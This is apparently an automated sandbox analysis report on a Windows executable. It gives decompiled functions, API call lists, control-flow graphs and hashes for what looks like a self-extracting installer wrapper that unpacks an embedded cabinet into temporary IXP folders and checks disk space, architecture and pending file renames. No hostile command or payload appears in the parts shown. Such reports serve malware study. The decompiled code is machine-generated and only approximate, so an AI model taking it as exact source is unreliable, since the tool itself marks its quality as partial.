                                                                                                                                                                                                        0x00de5c14

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00DE59A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00DE59AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00DE5A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00DE5A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00DE5A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE5A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00DE5A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00DE5AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00DE5BFC
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                          • Part of subcall function 00DE6285: GetLastError.KERNEL32(00DE5BBC), ref: 00DE6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4237285672-0
                                                                                                                                                                                                        • Opcode ID: 9a027378aa901675de3d8244faa7aa1bac62a1c7778012e5195fbe9bc49d7bed
                                                                                                                                                                                                        • Instruction ID: 464195b626b12837e3a3281e6e80dd17ead8c946455453809f8844ae50d82b4d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a027378aa901675de3d8244faa7aa1bac62a1c7778012e5195fbe9bc49d7bed
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1271C2B190078CAFEB15EB25DCC5BFB77ACEB48384F1441A9F545D6244DA309E848B30
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 374 de4fe0-de501a call de468f FindResourceA LoadResource LockResource 377 de5020-de5027 374->377 378 de5161-de5163 374->378 379 de5029-de5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 de5057-de505e call de4efd 377->380 379->380 383 de507c-de50b4 380->383 384 de5060-de5077 call de44b9 380->384 389 de50e8-de5104 call de44b9 383->389 390 de50b6-de50da 383->390 388 de5107-de510e 384->388 392 de511d-de511f 388->392 393 de5110-de5117 FreeResource 388->393 402 de5106 389->402 401 de50dc 390->401 390->402 394 de513a-de5141 392->394 395 de5121-de5127 392->395 393->392 399 de515f 394->399 400 de5143-de514a 394->400 395->394 398 de5129-de5135 call de44b9 395->398 398->394 399->378 400->399 404 de514c-de5159 SendMessageA 400->404 405 de50e3-de50e6 401->405 402->388 404->399 405->389 405->402
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00DE4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				struct HWND__* _t9;
                                                                                                                                                                                                        				int _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        				struct HWND__* _t27;
                                                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t36 = "CABINET";
                                                                                                                                                                                                        				 *0xde9144 = E00DE468F(_t36, 0, 0);
                                                                                                                                                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                        				 *0xde9140 = _t8;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					return _t8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t9 =  *0xde8584; // 0x0
                                                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                        					ShowWindow(GetDlgItem( *0xde8584, 0x841), 5); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t10 = E00DE4EFD(0, 0); // executed
                                                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                                                        					__imp__#20(E00DE4CA0, E00DE4CC0, E00DE4980, E00DE4A50, E00DE4AD0, E00DE4B60, E00DE4BC0, 1, 0xde9148, _t33);
                                                                                                                                                                                                        					_t34 = _t10;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						_t29 =  *0xde9148; // 0x0
                                                                                                                                                                                                        						_t24 =  *0xde8584; // 0x0
                                                                                                                                                                                                        						E00DE44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#22(_t34, "*MEMCAB", 0xde1140, 0, E00DE4CD0, 0, 0xde9140); // executed
                                                                                                                                                                                                        					_t37 = _t10;
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#23(_t34); // executed
                                                                                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 =  *0xde8584; // 0x0
                                                                                                                                                                                                        					E00DE44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_t12 =  *0xde9140; // 0x0
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						FreeResource(_t12);
                                                                                                                                                                                                        						 *0xde9140 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						_t47 =  *0xde91d8; // 0x0
                                                                                                                                                                                                        						if(_t47 == 0) {
                                                                                                                                                                                                        							E00DE44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(( *0xde8a38 & 0x00000001) == 0 && ( *0xde9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                        						SendMessageA( *0xde8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t37;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00DE4FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00DE5006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00DE500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00DE5030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00DE5037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00DE504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00DE5051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00DE5111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00DE5159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: 35011cb55a02caba9efdbc66e0973ff58c62453d0e9d50354fe9f6cb929515d4
                                                                                                                                                                                                        • Instruction ID: 7728fbcb9c47fbfbbcdd4274d483183ee2f385b26d2466106a1cfd586260cdd3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35011cb55a02caba9efdbc66e0973ff58c62453d0e9d50354fe9f6cb929515d4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A31D4B07417D27FD7207B67ADC9F67765CEB44799F080028F906EA3A5DAB49C009670
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00DE53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				long _t13;
                                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                                        				CHAR* _t20;
                                                                                                                                                                                                        				int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				CHAR* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                        				_t32 = __edx;
                                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                                        				_t29 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E00DE171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                        					_t34 = _t34 + 0x10;
                                                                                                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                                                                                                        					E00DE1680(_t32, 0x104, _t20);
                                                                                                                                                                                                        					E00DE658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                        					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                        					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t29 < 0x190) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t30 = 0;
                                                                                                                                                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                        						_t30 = 1;
                                                                                                                                                                                                        						DeleteFileA(_t32);
                                                                                                                                                                                                        						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return E00DE6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t30 = 1;
                                                                                                                                                                                                        				 *0xde8a20 = 1;
                                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE171E: _vsnprintf.MSVCRT ref: 00DE1750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE53FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-390439592
                                                                                                                                                                                                        • Opcode ID: 5a863b693c9312334b2a03fd3713fc3b1b3a10550c0171ea5d96de2630671dc4
                                                                                                                                                                                                        • Instruction ID: 9777991d0e2f8b94b2b690895f4a57ecf14a83ee0b2046304ac0ae01202e2f2e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a863b693c9312334b2a03fd3713fc3b1b3a10550c0171ea5d96de2630671dc4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9211277130068467D720BB3BAC89FAF7A6DEFC1765F000125F546D62D4CE749D8686B1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00DE5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t10 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				if(__edx == 0) {
                                                                                                                                                                                                        					_t48 = 0xde91e4;
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00DE1680(0xde91e4, 0x104);
                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                        					_t13 = E00DE58C8(_t48); // executed
                                                                                                                                                                                                        					if(_t13 != 0) {
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						_t42 = _a4;
                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							 *0xde9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        							L24:
                                                                                                                                                                                                        							return E00DE6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t16 = E00DE597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t61 =  *0xde8a20; // 0x0
                                                                                                                                                                                                        						if(_t61 != 0) {
                                                                                                                                                                                                        							 *0xde8a20 = 0;
                                                                                                                                                                                                        							RemoveDirectoryA(_t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                        						_t14 = 0;
                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                        						 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xde8a20 = 1;
                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 =  &_v268;
                                                                                                                                                                                                        				_t20 = E00DE53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t48 = 0xde91e4;
                                                                                                                                                                                                        				E00DE1781(0xde91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                        				if(( *0xde9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00DE658A(_t48, 0x104, 0xde1140);
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				GetSystemInfo( &_v304);
                                                                                                                                                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					_push("i386");
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					E00DE658A(_t48, 0x104);
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = _t26 - 1;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					_push("mips");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = _t28 - 1;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					_push("alpha");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t29 != 1) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push("ppc");
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}


                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE54C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE556F
                                                                                                                                                                                                          • Part of subcall function 00DE53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE53FB
                                                                                                                                                                                                          • Part of subcall function 00DE53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5402
                                                                                                                                                                                                          • Part of subcall function 00DE53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE541F
                                                                                                                                                                                                          • Part of subcall function 00DE53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE542B
                                                                                                                                                                                                          • Part of subcall function 00DE53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-994843058
                                                                                                                                                                                                        • Opcode ID: 570f9fd80fd797e71b3dd4f246880215e59b69aea935da5702de54fa19f71439
                                                                                                                                                                                                        • Instruction ID: f4f93751eaa85c7797e1b450027bd16a3238b2108e5ca46c061894a102700e46
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 570f9fd80fd797e71b3dd4f246880215e59b69aea935da5702de54fa19f71439
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E310A71700BD15BCB10BF2BBC8457EB79AEB913C8B48017AE445C674CDA70CE4586B1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 519 de256d-de257d 520 de2622-de2627 call de24e0 519->520 521 de2583-de2589 519->521 528 de2629-de262f 520->528 523 de258b 521->523 524 de25e8-de2607 RegOpenKeyExA 521->524 523->528 529 de2591-de2595 523->529 525 de2609-de2620 RegQueryInfoKeyA 524->525 526 de25e3-de25e6 524->526 530 de25d1-de25dd RegCloseKey 525->530 526->528 529->528 531 de259b-de25ba RegOpenKeyExA 529->531 530->526 531->526 532 de25bc-de25cb RegQueryValueExA 531->532 532->530
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00DE256D(signed int __ecx) {
                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t31 = E00DE24E0(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t13 - 1;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                        							if(_t24 == 0) {
                                                                                                                                                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                        								RegCloseKey(_v12); // executed
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t31 = _v8;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t31;
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00DE4096,00DE4096,?,00DE1ED3,00000001,00000000,?,?,00DE4137,?), ref: 00DE25B2
